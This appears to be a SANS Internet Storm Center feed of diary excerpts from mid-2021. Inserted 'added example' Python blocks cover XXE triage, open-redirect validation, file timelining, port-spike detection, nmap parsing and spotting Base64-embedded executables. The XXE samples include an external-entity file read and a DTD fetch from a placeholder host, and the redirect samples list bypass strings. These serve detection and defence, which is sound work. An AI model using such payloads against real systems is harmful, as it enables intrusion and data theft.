SANS Internet Storm Center, InfoCON: green

DIY CD/DVD Destruction, (Sun, Jun 27th)

June 27th 2021 at 19:14
I have some personal CDs & DVDs to dispose of. And I don't want them to remain (easily) readable.

CVE-2019-9670: Zimbra Collaboration Suite XXE vulnerability, (Sat, Jun 26th)

June 26th 2021 at 10:13
This XML External Entity injection (XXE) vulnerability disclosed in March 2019 is still actively scanned for a vulnerable mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. This exploit attempts to read the Zimbra configuration file that contains an LDAP password for the zimbra account.
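As an added illustration of the two sides of the issue described above (example code written for this page, not Zimbra's code and not the scanner's payload): a small Python triage that flags external-entity declarations in XML request bodies, and a parser wrapper that refuses any document carrying a DTD, which is the simplest way to close XXE in an API that never needs DTDs. The request bodies are constructed; the file URI and DTD host in them are placeholders, not the paths the real scans request.

```python
import re
import xml.etree.ElementTree as ET

# Constructed XML request bodies in the shape of a SOAP-style POST. The file URI
# and the DTD host are placeholders for this example, not values from real scans.
SAMPLE_BODIES = {
    "benign": '<?xml version="1.0"?><Request><Name>alice</Name></Request>',
    "xxe_file": (
        '<?xml version="1.0"?>'
        '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]>'
        '<Request><Name>&x;</Name></Request>'
    ),
    "xxe_param": (
        '<?xml version="1.0"?>'
        '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://203.0.113.5/evil.dtd"> %p;]>'
        '<Request/>'
    ),
}

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# A general (&x;) or parameter (%p;) entity declared with an external identifier.
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+(%\s*)?\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)


def xxe_indicators(body: str) -> dict:
    """Return the XXE-related markers present in one request body."""
    return {
        "doctype": bool(DOCTYPE_RE.search(body)),
        "external_entity": bool(EXT_ENTITY_RE.search(body)),
        "parameter_entity": bool(PARAM_ENTITY_RE.search(body)),
        "file_uri": "file://" in body.lower(),
    }


def is_xxe_attempt(body: str) -> bool:
    """A DTD declaring an external or parameter entity is never legitimate
    traffic for an API that only exchanges plain element data."""
    ind = xxe_indicators(body)
    return ind["external_entity"] or ind["parameter_entity"]


def parse_untrusted_xml(body: str) -> ET.Element:
    """Parse client-supplied XML, refusing any document with a DTD.
    Rejecting DOCTYPE up front removes every entity-based attack at once,
    independent of how the underlying parser happens to be configured."""
    if DOCTYPE_RE.search(body):
        raise ValueError("DOCTYPE/DTD not permitted in client-supplied XML")
    return ET.fromstring(body)


def parser_rejects(body: str) -> bool:
    """True when parse_untrusted_xml refuses the body."""
    try:
        parse_untrusted_xml(body)
    except ValueError:
        return True
    return False


def triage(bodies: dict) -> dict:
    """Map each body name to 'xxe' or 'ok' for a quick log review."""
    return {name: ("xxe" if is_xxe_attempt(b) else "ok") for name, b in bodies.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_BODIES).items():
        print(f"{name:10s} {verdict}  {xxe_indicators(SAMPLE_BODIES[name])}")
```

The regexes are meant for triaging captured request bodies; the `parse_untrusted_xml` check is the part that belongs in application code, where refusing DOCTYPE is cheaper and safer than trying to configure every parser option correctly.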

Is this traffic bAD?, (Fri, Jun 25th)

June 25th 2021 at 00:45
It seems like every time I take a handler shift lately, I'm talking about an uptick of traffic on another port and I'm not breaking that trend today. This really takes me back to the early days of the Internet Storm Center when that seemed to be the main thing we talked about. This time, the port that got my attention is UDP port 389. This is the normal port for the Lightweight Directory Access Protocol (LDAP) which is used a great deal by Microsoft Active Directory (AD).

Do you Like Cookies? Some are for sale!, (Thu, Jun 24th)

June 24th 2021 at 05:33
Cookies… These small pieces of information are always with us. Since the GDPR was kicked off in Europe, we are flooded by pop-ups asking if we accept “cookies”. Honestly, most people don’t take time to read the warning and just accept the default settings.

Standing With Security Researchers Against Misuse of the DMCA, (Wed, Jun 23rd)

June 23rd 2021 at 15:56
As Dean of Research for our graduate school (sans.edu), I often assist students in developing their research ideas. The research conducted by our students is valuable and important to defend our networks against highly organized and well-funded threat actors. Any restriction on our students' ability to conduct their research, and share their results freely, only adds additional unnecessary burdens on us as network defenders. With that, I am happy that I was able to co-sign the attached statement by the Electronic Frontier Foundation (EFF) on behalf of the SANS Technology Institute. Legal threats against good faith security researchers only discourage the open exchange of ideas. If we hope to have a chance to defend, we will have to keep exchanging these ideas and learning, and we need to continue to be curious hackers exploring the technologies that are the foundation of our everyday living.

Phishing asking recipients not to report abuse, (Tue, Jun 22nd)

June 22nd 2021 at 13:15
It can be a little disheartening to deal with well-prepared phishing attacks every day, since one can easily see how even users who are fully “security-aware” could fall for some of them. The messages don’t even have to be too complex to be believable. For example, a message containing seemingly innocuous text and a link that points to a legitimate, well-known domain hosting an application that is affected by an open redirect vulnerability (I’m looking at you, Google[1], though – to be fair – you’re hardly alone[2]) can look quite trustworthy, if no obvious red flags are present.

Mitre CWE - Common Weakness Enumeration, (Mon, Jun 21st)

June 21st 2021 at 19:10
If you are involved in the security industry, you are at least somewhat familiar with the Mitre ATT&CK framework, the very useful, community driven knowledgebase of attack threat models and methodologies which can be used to emulate adversary behavior to test security controls. However, fewer are aware of a lesser known Mitre project, Common Weakness Enumeration (CWE).

Video: oledump Cheat Sheet, (Sun, Jun 20th)

June 20th 2021 at 14:59
I did create a SANS cheat sheet for oledump.py.

Easy Access to the NIST RDS Database, (Sat, Jun 19th)

June 19th 2021 at 10:27
When you're facing some suspicious files while performing forensic investigations or analyzing malware components, it's always interesting to know whether these files are legit or malicious/modified. One of the key sources to verify hashes is provided by NIST and is called the NSRL project ("National Software Reference Library")[1]. They build "Reference Data Sets" (RDS) of information that can be queried to verify a file hash. These RDS are available to download[2] but, as you may expect, they are huge (they are provided as ISO files between 500MB and 4GB!)

Open redirects ... and why Phishers love them, (Fri, Jun 18th)

June 18th 2021 at 13:03
Working from home, did you get a meeting invite recently that pointed to https://meet.google.com ? Well, that's indeed where Google's online meeting tool is located. But potentially the URL you got is not "only" leading you there.
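This diary and the phishing diary above hinge on the same bug: a redirect parameter that the application forwards without checking. As an added example (written for this page, not Google's code and not from either diary), here is a Python validator that accepts only same-site paths or absolute URLs to an explicit host allow-list, next to the naive version that resolves whatever it receives. The allow-list and base URL are assumptions; the parameter values are constructed and cover the usual bypasses: protocol-relative `//host`, backslashes, `user@host` confusion, a look-alike subdomain and a non-http scheme.

```python
from urllib.parse import urljoin, urlsplit, urlunsplit

# Assumed for this example: hosts this application may legitimately send users to.
ALLOWED_HOSTS = {"meet.google.com", "app.example.com"}
BASE_URL = "https://app.example.com/"


def vulnerable_redirect_target(base: str, next_url: str) -> str:
    """The open-redirect pattern: trust the parameter and resolve it as-is."""
    return urljoin(base, next_url)


def safe_redirect_target(base: str, next_url: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return where to redirect, or `base` when next_url cannot be trusted.

    Exactly two shapes are accepted: a same-site absolute path ("/inbox") or an
    http(s) URL whose hostname is on the allow-list. Everything else, including
    protocol-relative URLs and userinfo tricks, falls back to the base URL."""
    # Browsers treat "\" as "/" in the authority part, so normalise first;
    # otherwise "/\evil.example" parses as a path and becomes "//evil.example".
    candidate = (next_url or "").strip().replace("\\", "/")
    try:
        parts = urlsplit(candidate)
        _ = parts.port  # raises ValueError on a malformed port such as "host:abc"
    except ValueError:
        return base

    if parts.netloc:
        # Absolute or protocol-relative URL: http(s) only, no userinfo, and an
        # exact hostname match (so "meet.google.com.evil.example" is refused).
        if parts.scheme not in ("", "http", "https"):
            return base
        if "@" in parts.netloc or (parts.hostname or "").lower() not in allowed_hosts:
            return base
        scheme = parts.scheme or urlsplit(base).scheme
        return urlunsplit((scheme, parts.netloc, parts.path or "/", parts.query, parts.fragment))

    # No authority: must be a plain same-site path. "https:evil.example",
    # "javascript:..." and anything starting with "//" are rejected here.
    if parts.scheme or not candidate.startswith("/") or candidate.startswith("//"):
        return base
    return urljoin(base, candidate)


# Constructed redirect parameter values covering common bypass attempts.
SAMPLE_NEXT_VALUES = [
    "/inbox",
    "https://meet.google.com/abc-defg-hij",
    "//evil.example/login",
    "/\\evil.example",
    "https://meet.google.com@evil.example/",
    "https://evil.example\\@meet.google.com/",
    "https://meet.google.com.evil.example/",
    "https:evil.example",
    "javascript:alert(1)",
]


def compare(base: str, values) -> dict:
    """For each parameter value, return (naive destination, validated destination)."""
    return {v: (vulnerable_redirect_target(base, v), safe_redirect_target(base, v)) for v in values}


if __name__ == "__main__":
    for v, (naive, safe) in compare(BASE_URL, SAMPLE_NEXT_VALUES).items():
        print(f"{v!r:45} naive={naive!r:45} safe={safe!r}")
```

The design choice worth noting is that the safe version never tries to "fix" a bad value; anything that is not one of the two accepted shapes lands on the base URL, which keeps the decision logic short enough to review.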

Network Forensics on Azure VMs (Part #2), (Fri, Jun 18th)

June 18th 2021 at 00:28
In yesterday's diary, we took a look at two methods that allow to capture network connection information off a potentially compromised virtual machine in Azure. Today, we'll investigate the most recent addition to the VM monitoring arsenal, namely "Azure Monitor Insights".

Network Forensics on Azure VMs (Part #1), (Thu, Jun 17th)

June 17th 2021 at 14:40
The tooling to investigate a potentially malicious event on an Azure Cloud VM is still in its infancy. We have covered before (Forensicating Azure VMs) how we can create a snapshot of the OS disk of a running VM. Snapshotting and then killing off the infected VM is very straight forward, but it also tips off an intruder that he has been found out. Sometimes, it makes sense to first watch for a while, and learn more, for example about compromised accounts, lateral movement, or other involved hosts.

Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more, (Tue, Jun 15th)

June 15th 2021 at 10:16
Vulnerable perimeter devices remain a popular target, and we do see consistent exploit attempts against them. This weekend, Guy wrote about some scans for Fortinet vulnerabilities [1], and Xavier notes that Crowdstrike observed attacks against EoL Sonicwalls [2]. Starting earlier this month, we did also observe a consistent trickle of requests looking for a relatively recent Sonicwall vulnerability:

Update: mac-robber.py, (Sun, Jun 13th)

June 13th 2021 at 01:34
Almost 4 years ago, I wrote a python version of mac-robber. I use it fairly regularly at $dayjob. This past week, one of my co-workers was using it, but realized that it hashes large files a little too slowly. He decided to use mac-robber.py to collect the MAC times and do the hashing separately so he could limit the hashes to files under a certain size. That sounded reasonable, so I've added a switch (-s or --size). If hashing is turned on the new switch will limit the hashing to files under the given size.
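As an added example of the collection loop the diary describes (written for this page; it is not mac-robber.py itself and makes no claim about that script's internals), the following Python walks a tree, records mode, size and MAC times from `lstat()`, hashes only regular files below a size limit, and emits Sleuth Kit body-format lines that `mactime` can read. The sample tree and its two files are constructed by the script; SHA-256 is used here as the hash.

```python
import hashlib
import os
import stat
import tempfile
from typing import Optional

# Constructed sample contents for the demo tree built below.
SMALL_CONTENT = b"hello isc\n"      # 10 bytes: below the limit, gets hashed
BIG_CONTENT = b"A" * 2048           # 2 KiB: above the limit, MAC times only


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def collect(root: str, hash_limit: Optional[int] = None) -> list:
    """Walk `root` and record mode, size and MAC times for every entry.

    Regular files are hashed only when hash_limit is None (hash everything)
    or the file is smaller than hash_limit bytes. lstat() runs before any
    read so hashing cannot disturb the atime being recorded, and symlinks
    are recorded as links rather than followed."""
    records = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            rec = {
                "hash": "0", "path": path, "inode": st.st_ino,
                "mode": stat.filemode(st.st_mode), "uid": st.st_uid, "gid": st.st_gid,
                "size": st.st_size, "atime": int(st.st_atime),
                "mtime": int(st.st_mtime), "ctime": int(st.st_ctime),
            }
            if stat.S_ISREG(st.st_mode) and (hash_limit is None or st.st_size < hash_limit):
                rec["hash"] = sha256_file(path)
            records.append(rec)
    return records


def body_line(rec: dict) -> str:
    """One line in the Sleuth Kit body format read by mactime:
    hash|name|inode|mode|uid|gid|size|atime|mtime|ctime|crtime.
    lstat() gives no creation time on most platforms, so crtime is 0."""
    fields = ("hash", "path", "inode", "mode", "uid", "gid", "size", "atime", "mtime", "ctime")
    return "|".join(str(rec[k]) for k in fields) + "|0"


def build_sample_tree() -> str:
    """Create a throwaway directory holding one small and one large file."""
    root = tempfile.mkdtemp(prefix="macrobber-")
    with open(os.path.join(root, "small.txt"), "wb") as f:
        f.write(SMALL_CONTENT)
    with open(os.path.join(root, "big.bin"), "wb") as f:
        f.write(BIG_CONTENT)
    return root


def demo(hash_limit: Optional[int] = 1024) -> dict:
    """Collect the sample tree with a size limit; records keyed by file name."""
    root = build_sample_tree()
    return {os.path.basename(r["path"]): r for r in collect(root, hash_limit)}


if __name__ == "__main__":
    for rec in demo().values():
        print(body_line(rec))
```

Running it with a limit of 1024 bytes prints two body lines: `small.txt` carries a real digest in the first field, `big.bin` carries `0`, and both still have complete timestamps for the timeline.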

Fortinet Targeted for Unpatched SSL VPN Discovery Activity, (Sat, Jun 12th)

June 12th 2021 at 17:32
Over the past 60 days, I have observed scanning activity to discover FortiGate SSL VPN unpatched services. Fortinet has fixed several critical vulnerabilities in SSL VPN and web firewall this year from Remote Code Execution (RCE) to SQL Injection, Denial of Service (DoS) which impact the FortiProxy SSL VPN and FortiWeb Web Application Firewall (WAF) products [1][2]. Two weeks ago, US-CERT [4] released an alert re-iterating that APT actors are looking for Fortinet vulnerabilities to gain access to networks. Additional information to look for signs of this activity is available here.

Sonicwall SRA 4600 Targeted By an Old Vulnerability, (Fri, Jun 11th)

June 11th 2021 at 13:55
Devices and applications used to provide remote access are juicy targets. I've already been involved in many ransomware cases and most of the time, the open door was an unpatched VPN device/remote access solution or weak credentials. A good example is the recent attack against the Colonial Pipeline that started with a legacy VPN profile[1].

Keeping an Eye on Dangerous Python Modules, (Fri, Jun 11th)

June 11th 2021 at 05:31
With Python getting more and more popular, especially on Microsoft operating systems, it's common to find malicious Python scripts today. I already covered some of them in previous diaries[1][2]. I like this language because it is very powerful: You can automate boring tasks in a few lines. It can be used for offensive as well as defensive purposes, and... it has a lot of 3rd party "modules" or libraries that extend its capabilities. For example, if you would like to use Python for forensics purposes, you can easily access the registry and extract data:

Are Cookie Banners a Waste of Time or a Complete Waste of Time?, (Thu, May 20th)

June 10th 2021 at 12:08
Legislation, in particular in the European Union, has led to a proliferation of "Cookie Banners." Warning banners that either ask you for blanket permission to set cookies or, in some cases, provide you with some control as to what cookies you do allow. These regulations emerged after advertisers made excessive use of HTTP Cookies to track users across different sites. But in my opinion, these measures are often implemented poorly. Changes in browsers have made cookies far less menacing than they have been in the past. Other tracking technologies are bound to replace cookies and, in some cases, already have.

Architecture, compilers and black magic, or "what else affects the ability of AVs to detect malicious files", (Wed, Jun 9th)

June 9th 2021 at 11:23
In my last diary, we went over the impact of different Base encodings on the ability of anti-malware tools to detect malicious code[1]. Since results of our tests showed (among other things) that AV tools in general still struggle significantly more with detecting 64-bit malicious code than 32-bit malicious code, I thought it might be interesting to discuss another factor that might impact the ability of AVs to detect malware – specifically the choice of a compiler.

Microsoft June 2021 Patch Tuesday, (Tue, Jun 8th)

June 8th 2021 at 17:57
This month we got patches for 50 vulnerabilities. Of these, 5 are critical, 2 were previously disclosed and 6 are already being exploited according to Microsoft.

Amazon Sidewalk: Cutting Through the Hype, (Mon, Jun 7th)

June 7th 2021 at 19:22
Later this week (tomorrow?), Amazon will enable its new Sidewalk feature. The feature has already gotten a lot of bad press. Much of this comes from the fact that existing devices are automatically used as Sidewalk Gateways, and users will have to opt out. New devices may require a specific opt-in during setup.

Strange goings on with port 37, (Thu, Jun 3rd)

June 5th 2021 at 02:45
Similar to Yee Ching's diary on Thursday, I noticed an oddity in the Dshield data last weekend (which I had hoped to discuss in a diary on Wednesday, but life got in the way) and thought it was worth asking around to see if anyone knows what is going on. As soon as I saw it, I reconfigured my honeypots to try to capture the traffic, but wasn't able to. I'm always very interested when I see some of the legacy ports and protocols pop up. In this case, %%port:37%% is the time protocol which operates on both TCP and UDP and is one of the many services that frequently ran on the low ports of Unix machines I administered back in the 1980s and 1990s. In recent years, most operating systems have disabled these services since they only seemed to be used for DDoS purposes. On Thursday, I took another look at the graph.

Russian Dolls VBS Obfuscation, (Fri, Jun 4th)

June 4th 2021 at 05:01
We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat! Henry's sample was delivered in a password-protected ZIP archive and the file was a VBS script called "presentation_37142.vbs" (SHA256:2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f). I uploaded a copy of the file on MalwareBazaar[1].

DShield Data Analysis: Taking a Look at Port 45740 Activity, (Thu, Jun 3rd)

June 3rd 2021 at 07:00
At the SANS Internet Storm Center (ISC), handlers frequently analyze data submitted from DShield participants to determine activity trends and potential attacks. A few days ago on May 31st, I observed a small anomaly for %%port:45740%% and decided to monitor it for the next 3 days or so. There was a huge spike in number of sources/day and reports/day recorded on May 31st as shown in Figure 1.
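The spike the diary refers to is the kind of thing a robust baseline picks out automatically. As an added example (written for this page, not ISC tooling), the following Python flags anomalous days in a per-port series of sources/day and reports/day using a median/MAD modified z-score, so that the spike itself does not inflate the baseline it is compared against, and reports the reports-per-source ratio for each flagged day (many sources with a modest ratio suggests a distributed scanner; few sources with a high ratio suggests a handful of noisy hosts). The daily counts are constructed for the example and are not DShield data.

```python
import statistics

# Constructed per-day counts for one port: (day, sources, reports). Not real DShield data.
SAMPLE_COUNTS = [
    ("2021-05-25", 3, 12), ("2021-05-26", 4, 15), ("2021-05-27", 2, 9),
    ("2021-05-28", 5, 20), ("2021-05-29", 3, 11), ("2021-05-30", 4, 16),
    ("2021-05-31", 180, 2400), ("2021-06-01", 95, 1300), ("2021-06-02", 60, 700),
]


def robust_zscores(values) -> list:
    """Modified z-score: 0.6745 * (x - median) / MAD.

    Median and median absolute deviation replace mean and standard deviation
    so a single huge day does not drag the baseline up and hide itself."""
    med = statistics.median(values)
    mad = statistics.median([abs(v - med) for v in values])
    if mad == 0:  # perfectly flat baseline: fall back to mean absolute deviation
        mad = statistics.mean([abs(v - med) for v in values]) * 1.2533 or 1.0
    return [0.6745 * (v - med) / mad for v in values]


def find_spikes(rows, threshold: float = 3.5) -> list:
    """Return (day, sources, reports, reports_per_source) for days whose source
    count is anomalous. 3.5 is the conventional cut-off for modified z-scores."""
    zs = robust_zscores([r[1] for r in rows])
    spikes = []
    for (day, sources, reports), z in zip(rows, zs):
        if z > threshold:
            spikes.append((day, sources, reports, round(reports / max(sources, 1), 1)))
    return spikes


def baseline(rows) -> dict:
    """Median sources/day and reports/day, useful context next to the spike list."""
    return {
        "median_sources": statistics.median(r[1] for r in rows),
        "median_reports": statistics.median(r[2] for r in rows),
    }


if __name__ == "__main__":
    print(baseline(SAMPLE_COUNTS))
    for day, sources, reports, ratio in find_spikes(SAMPLE_COUNTS):
        print(f"{day}: {sources} sources, {reports} reports, {ratio} reports/source")
```

On the constructed series the three days from May 31st are flagged, each with roughly 12 to 14 reports per source, while the six baseline days stay under the threshold.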

Wireshark 3.4.6 (and 3.2.14) released, (Wed, Jun 2nd)

June 2nd 2021 at 20:15
A new version of Wireshark is out, with a couple of bug fixes including a QUIC TLS decryption issue. Also, the Windows version now comes with npcap 1.31 (updated from 1.10).

Quick and dirty Python: nmap, (Mon, May 31st)

May 31st 2021 at 19:20
Continuing on from the "Quick and dirty Python: masscan" diary, which implemented a simple port scanner in Python using masscan to detect web instances on TCP ports 80 or 443. Masscan is perfectly good as a blunt instrument to quickly find open TCP ports across large address spaces, but for fine details it is better to use a scanner like nmap that, while much slower, is able to probe the port to get a better idea of what is running.
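As an added example of the "fine details" step (written for this page, not the diary's own script), the following Python drives `nmap -sV` with XML on stdout and flattens the result into one record per port, keeping nmap's `method` attribute so that services it actually probed can be told apart from plain port-number guesses. The XML below is constructed to look like `-sV` output for one host in the documentation address range; `scan()` shells out to a real nmap and is only called when you have a target you are allowed to scan.

```python
import subprocess
import xml.etree.ElementTree as ET

# Constructed nmap -sV XML for one host. Address from the documentation range,
# product strings are placeholders.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 80,443,8080 -oX - 192.0.2.10" start="1622400000">
<host><status state="up" reason="echo-reply"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
  <service name="http" product="nginx" version="1.18.0" method="probed" conf="10"/></port>
<port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/>
  <service name="http" product="Apache httpd" version="2.4.41" tunnel="ssl" method="probed" conf="10"/></port>
<port protocol="tcp" portid="8080"><state state="closed" reason="reset"/>
  <service name="http-proxy" method="table" conf="3"/></port>
</ports></host>
<runstats><finished time="1622400060" elapsed="60.00"/><hosts up="1" down="0" total="1"/></runstats>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> list:
    """Flatten nmap XML into one dict per (host, port)."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else None
        for port in host.findall("ports/port"):
            state = port.find("state")
            svc = port.find("service")
            rows.append({
                "host": ip,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": state.get("state") if state is not None else None,
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
                "tls": (svc.get("tunnel") == "ssl") if svc is not None else False,
                # "probed": nmap exchanged data with the service.
                # "table": only the well-known port number was consulted.
                "probed": (svc.get("method") == "probed") if svc is not None else False,
            })
    return rows


def open_web_services(rows: list) -> list:
    """Ports nmap confirmed open and identified as HTTP(S) by probing them."""
    return [r for r in rows if r["state"] == "open" and r["probed"]
            and r["service"] in ("http", "https")]


def scan(targets: list, ports: str = "80,443,8080") -> list:
    """Run nmap with service detection, XML on stdout, and parse the result.
    Needs nmap on PATH and permission to scan the targets."""
    cmd = ["nmap", "-sV", "-p", ports, "-oX", "-"] + list(targets)
    out = subprocess.run(cmd, check=True, capture_output=True, text=True).stdout
    return parse_nmap_xml(out)


if __name__ == "__main__":
    for r in open_web_services(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print(f"{r['host']}:{r['port']} {r['product']} {r['version']} tls={r['tls']}")
```

Feeding the open hosts found by the masscan step into `scan()` in small batches keeps the slow part of the pipeline confined to ports already known to answer.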

Video: Cobalt Strike & DNS - Part 1, (Sun, May 30th)

May 30th 2021 at 16:48
One of the Cobalt Strike servers reported by Brad Duncan also communicates over DNS.

Sysinternals: Procmon, Sysmon, TcpView and Process Explorer update, (Sun, May 30th)

May 30th 2021 at 10:55
New versions of Sysinternals' tools Procmon, Sysmon, TcpView and Process Explorer were released.

YARA Release v4.1.1, (Sun, May 30th)

May 30th 2021 at 10:44
YARA version 4.1.1 was released.

Spear-phishing Email Targeting Outlook Mail Clients, (Sat, May 29th)

May 29th 2021 at 17:18
In February I posted about spam pretending to be an Outlook Version update [1] and now for the past several weeks I have been receiving spear-phishing emails that pretend to be coming from Microsoft Outlook to "Sign in to verify" my account, new terms of services, new version, etc. There also have been some reports this week about a large ongoing spear-phishing campaign [2][3] worth reading. Here are some samples which always include a sense of urgency to login as soon as possible:

Malicious PowerShell Hosted on script.google.com, (Fri, May 28th)

May 28th 2021 at 05:37
Google has an incredible portfolio of services. Besides the classic ones, there are less known services and... they could be very useful for attackers too. One of them is Google Apps Script[1]. Google describes it like this:

All your Base are...nearly equal when it comes to AV evasion, but 64-bit executables are not, (Thu, May 27th)

May 27th 2021 at 09:28
Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of invention and in the case of malware, it has led its authors to devise some very interesting ways to hide from detection over the years – from encoding of executable files into valid bitmap images[1] to multi-stage encryption of malicious payloads[2] and much further. Many of these techniques continue to be used effectively in the wild by malicious actors as well as by red teams that emulate them. Probably none of these techniques (perhaps with the exception of simple XOR encryption) has been used so widely as Base64 encoding of malicious payloads.
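Since the diary's finding is that the encoding barely matters but the bitness of the payload does, an added example of the check a defender can make independently of the AV verdict (written for this page, not the diary's test harness): decode every long Base64 run in a script, test whether the result starts with a PE image, and read the architecture from the COFF `Machine` field. Decoding is more reliable than grepping for the familiar `TVqQ` prefix, which only appears when the `MZ` header starts the encoded data and its third byte is 0x90. The loader snippet and the "PE" inside it are constructed here; the fake image is a header only and is not executable.

```python
import base64
import binascii
import re
import struct

# Runs of Base64 alphabet long enough to hold at least a DOS header plus PE signature.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0xAA64: "arm64"}


def make_fake_pe(machine: int) -> bytes:
    """Smallest byte string the checks below accept: a DOS header whose e_lfanew
    points at a PE signature followed by a COFF header. Constructed for this
    example; it carries no code and cannot run."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew: NT headers follow the DOS header
    coff = struct.pack("<H", machine) + bytes(18)   # Machine, remaining COFF fields zeroed
    return bytes(dos) + b"PE\0\0" + coff


def pe_machine(data: bytes):
    """Return the COFF Machine value if data starts with a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<H", data, e_lfanew + 4)[0]


def find_embedded_pe(text: str) -> list:
    """Decode every long Base64 run in text; report (offset, architecture) for
    each one that decodes to a PE image."""
    hits = []
    for m in B64_RUN.finditer(text):
        run = m.group(0)
        try:
            blob = base64.b64decode(run + "=" * (-len(run) % 4))
        except (binascii.Error, ValueError):
            continue
        machine = pe_machine(blob)
        if machine is not None:
            hits.append((m.start(), MACHINE_NAMES.get(machine, hex(machine))))
    return hits


# Constructed loader snippet: one blob holds the fake 64-bit image, the other
# holds harmless text of comparable length that must not be flagged.
_PE_B64 = base64.b64encode(make_fake_pe(0x8664)).decode()
_TEXT_B64 = base64.b64encode(
    b"The quick brown fox jumps over the lazy dog, again and again and again!!").decode()
SAMPLE_SCRIPT = (
    "$b = [System.Convert]::FromBase64String('" + _PE_B64 + "')\n"
    "$n = '" + _TEXT_B64 + "'\n"
)


if __name__ == "__main__":
    print(find_embedded_pe(SAMPLE_SCRIPT))
```

The same `pe_machine()` check works on the decoded output of any of the other Base encodings the diary compares; only the decode step changes.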

A Survey of Bluetooth Vulnerabilities Trends, (Wed, May 26th)

May 26th 2021 at 00:51
As usage of fitness trackers, wireless headsets and smart home devices becomes increasingly popular in our daily lives, a growing reliance on the Bluetooth protocol is expected, as it serves as the main medium of communication between devices. Amidst the COVID-19 pandemic, Bluetooth-enabled devices such as phones and hardware tokens were also used for contact-tracing purposes in countries such as Singapore [1]. Currently, the core specification of Bluetooth is 5.2 [2], and it is generally divided into 2 categories – Bluetooth Low Energy (BLE) and Bluetooth Classic [3]. Given the increasing popularity and usage of Bluetooth, I started to wonder about the trend of Bluetooth related vulnerabilities.

VMware Security Advisory VMSA-2021-0010, (Tue, May 25th)

May 25th 2021 at 18:05
VMware has issued a critical security advisory VMSA-2021-0010 (CVSSv3 scores ranging from 6.5 to 9.8). The products affected are VMware vCenter Server and VMware Cloud Foundation, and it addresses CVE-2021-21985 and CVE-2021-21986 [1].

Uncovering Shenanigans in an IP Address Block via Hurricane Electric's BGP Toolkit, (Tue, May 25th)

May 25th 2021 at 08:12
Today’s diary features a tip-off by one of our ISC diary readers, Earl. Earl discovered some dodgy domains within the IP address block of 95.181.152.0/24 via Hurricane Electric’s BGP Toolkit [1]. A look at the output of the IP address block of 95.181.152.0/24 showed a variety of domains that were related to popular sites such as Steam, Epic Games and Instagram, albeit with an assortment of misspelled URLs.